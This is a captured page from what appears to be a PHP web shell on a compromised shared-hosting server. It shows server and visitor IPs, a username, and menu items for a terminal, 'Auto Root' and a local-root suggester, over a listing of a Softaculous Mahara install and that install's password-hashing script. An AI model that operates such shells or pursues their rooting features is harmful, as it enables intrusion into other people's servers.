Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.219.197.162
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
mahara /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-05-06 01:45
php53
[ DIR ]
drwxr-xr-x
2024-05-06 01:45
php56
[ DIR ]
drwxr-xr-x
2024-05-06 01:45
php71
[ DIR ]
drwxr-xr-x
2024-05-06 01:45
php81
[ DIR ]
drwxr-xr-x
2024-05-06 01:45
php82
[ DIR ]
drwxr-xr-x
2024-05-06 01:45
changelog.txt
10.99
KB
-rw-r--r--
2022-11-07 11:38
clone.php
6.52
KB
-rw-r--r--
2024-05-02 11:43
config.php
3
KB
-rw-r--r--
2022-11-07 11:38
edit.php
5.4
KB
-rw-r--r--
2024-05-02 11:43
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
fileindex.php
509
B
-rw-r--r--
2021-12-23 11:54
import.php
3.31
KB
-rw-r--r--
2024-05-02 11:43
info.xml
4.74
KB
-rw-r--r--
2024-05-02 10:25
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
8.62
KB
-rw-r--r--
2024-05-02 11:43
install.xml
1.43
KB
-rw-r--r--
2021-12-23 11:54
md5
4.4
KB
-rw-r--r--
2024-05-02 11:43
mod_upgrade.php
63.6
KB
-rw-r--r--
2022-11-07 11:38
notes.txt
2.18
KB
-rw-r--r--
2022-05-02 08:51
org_upgrade.php
63.57
KB
-rw-r--r--
2022-11-07 11:38
update_pass.php
1.23
KB
-rw-r--r--
2021-12-23 11:54
upgrade.php
6.37
KB
-rw-r--r--
2024-05-02 11:43
upgrade.xml
334
B
-rw-r--r--
2022-05-02 08:51
Save
Rename
<?php $resp = __encrypt_password('[[admin_pass]]', '[[salt]]', '$2a$' . '12' . '$', '[[passwordsaltmain]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __encrypt_password($password, $salt='', $alg='$6$', $sitesalt='') { if ($salt == '') { $salt = substr(md5(rand(1000000, 9999999)), 2, 8); } if ($alg == '$6$') { // $6$ is the identifier for the SHA512 algorithm // Return a hash which is sha512(originalHash, salt), where original is sha1(salt + password) $password = sha1($salt . $password); // Generate a salt based on a supplied salt and the passwordsaltmain $fullsalt = substr(md5($sitesalt . $salt), 0, 16); // SHA512 expects 16 chars of salt } else { // This is most likely bcrypt $2a$, but any other algorithm can take up to 22 chars of salt // Generate a salt based on a supplied salt and the passwordsaltmain $fullsalt = substr(md5($sitesalt . $salt), 0, 22); // bcrypt expects 22 chars of salt } $hash = crypt($password, $alg . $fullsalt); // Strip out the computed salt // We strip out the salt hide the computed salt (in case the sitesalt was used which isn't in the database) $hash = substr($hash, 0, strlen($alg)) . substr($hash, strlen($alg)+strlen($fullsalt)); return $hash; } @unlink('update_pass.php'); ?>